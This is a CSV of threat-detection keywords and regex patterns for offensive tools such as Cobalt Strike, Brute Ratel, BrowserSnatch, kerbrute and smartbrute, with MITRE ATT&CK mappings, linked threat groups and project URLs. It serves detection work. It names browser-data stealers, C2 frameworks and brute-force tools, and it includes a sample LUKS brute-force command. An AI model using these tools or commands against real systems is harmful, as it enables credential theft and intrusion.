"*browserpivot *",".{0,1000}browserpivot\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36256"
"*BrowserSnatch -*",".{0,1000}BrowserSnatch\s\-.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","36257"
"*BrowserSnatch executed with *",".{0,1000}BrowserSnatch\sexecuted\swith\s.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","36258"
"*BrowserSnatch v1.0 - A versatile browser data extraction tool*",".{0,1000}BrowserSnatch\sv1\.0\s\-\sA\sversatile\sbrowser\sdata\sextraction\stool.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","36259"
"*BrowserSnatch.exe*",".{0,1000}BrowserSnatch\.exe.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","36260"
"*BrowserSnatch64.exe*",".{0,1000}BrowserSnatch64\.exe.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","36261"
"*BrowserSnatch-master.zip*",".{0,1000}BrowserSnatch\-master\.zip.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","36262"
"*BrowsingHistoryView.cfg*",".{0,1000}BrowsingHistoryView\.cfg.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36263"
"*BrowsingHistoryView.exe*",".{0,1000}BrowsingHistoryView\.exe.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36264"
"*browsinghistoryview.exe*",".{0,1000}browsinghistoryview\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","36265"
"*BROWSINGHISTORYVIEW.EXE-*.pf*",".{0,1000}BROWSINGHISTORYVIEW\.EXE\-.{0,1000}\.pf.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36266"
"*BrowsingHistoryView.html*",".{0,1000}BrowsingHistoryView\.html.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","36267"
"*browsinghistoryview.zip*",".{0,1000}browsinghistoryview\.zip.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36268"
"*browsinghistoryview-x64.zip*",".{0,1000}browsinghistoryview\-x64\.zip.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36269"
"*brun_script_in_mem*",".{0,1000}brun_script_in_mem.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","36271"
"*brunasadmin*",".{0,1000}brunasadmin.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36272"
"*Brute forcing passwords for *",".{0,1000}Brute\sforcing\spasswords\sfor\s.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","0","N/A","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","36273"
"*Brute forcing SIDs at *",".{0,1000}Brute\sforcing\sSIDs\sat\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","36274"
"*Brute/Brute.cs*",".{0,1000}Brute\/Brute\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","36275"
"*Brute/Brute.csproj*",".{0,1000}Brute\/Brute\.csproj.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","36276"
"*Brute/Brute.sln*",".{0,1000}Brute\/Brute\.sln.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","36277"
"*brute_force_ntlm.sh*",".{0,1000}brute_force_ntlm\.sh.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","36278"
"*bruteforce *.txt*",".{0,1000}bruteforce\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","36279"
"*Brute-force Unsuccessful!*",".{0,1000}Brute\-force\sUnsuccessful!.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","0","#content","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","36280"
"*bruteforce.go*",".{0,1000}bruteforce\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","36281"
"*BruteForce.ps1*",".{0,1000}BruteForce\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","36282"
"*Brute-Force.ps1*",".{0,1000}Brute\-Force\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","36283"
"*Brute-Force.ps1*",".{0,1000}Brute\-Force\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36284"
"*bruteforce_attack(*",".{0,1000}bruteforce_attack\(.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","36285"
"*bruteforce_mode_kerberos_mode*",".{0,1000}bruteforce_mode_kerberos_mode.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","36286"
"*bruteforce_mode_ntlm_mode*",".{0,1000}bruteforce_mode_ntlm_mode.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","36287"
"*bruteforce_try_password_or_hash(*",".{0,1000}bruteforce_try_password_or_hash\(.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","36288"
"*bruteforce_try_user(*",".{0,1000}bruteforce_try_user\(.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","36289"
"*BruteforceCLSIDs.*",".{0,1000}BruteforceCLSIDs\..{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","36290"
"*bruteForceCombos*",".{0,1000}bruteForceCombos.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","36291"
"*Brute-force-Instagram-*.git*",".{0,1000}Brute\-force\-Instagram\-.{0,1000}\.git.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","N/A","7","1","59","13","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z","36292"
"*bruteforce-luks -*",".{0,1000}bruteforce\-luks\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","36293"
"*bruteforce-luks -t 4 -l 5 -m 5 /dev/sdb1*",".{0,1000}bruteforce\-luks\s\-t\s4\s\-l\s5\s\-m\s5\s\/dev\/sdb1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","36294"
"*bruteforcePackageIDs(*",".{0,1000}bruteforcePackageIDs\(.{0,1000}","offensive_tool_keyword","SCCMSecrets","SCCMSecrets.py aims at exploiting SCCM policies distribution for credentials harvesting - initial access and lateral movement.","T1555 - T1078 - T1070 - T1021","TA0006 - TA0008 - TA0001","N/A","N/A","Lateral Movement","https://github.com/synacktiv/SCCMSecrets","1","0","N/A","N/A","8","3","208","22","2024-12-17T14:29:39Z","2024-08-14T09:45:44Z","36295"
"*bruteForceUser*",".{0,1000}bruteForceUser.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","36296"
"*Bruteloader Box Reflected*",".{0,1000}Bruteloader\sBox\sReflected.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","36297"
"*bruteloader*",".{0,1000}bruteloader.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36298"
"*brute-locadmin *",".{0,1000}brute\-locadmin\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","36299"
"*brute-ratel-*",".{0,1000}brute\-ratel\-.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36300"
"*BruteRatel*.tar.gz*",".{0,1000}BruteRatel.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36301"
"*BruteRatel*.zip*",".{0,1000}BruteRatel.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36302"
"*bruteratel.com/*",".{0,1000}bruteratel\.com\/.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36303"
"*bruteratel/*",".{0,1000}bruteratel\/.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36304"
"*Brute-Ratel-C4*",".{0,1000}Brute\-Ratel\-C4.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36305"
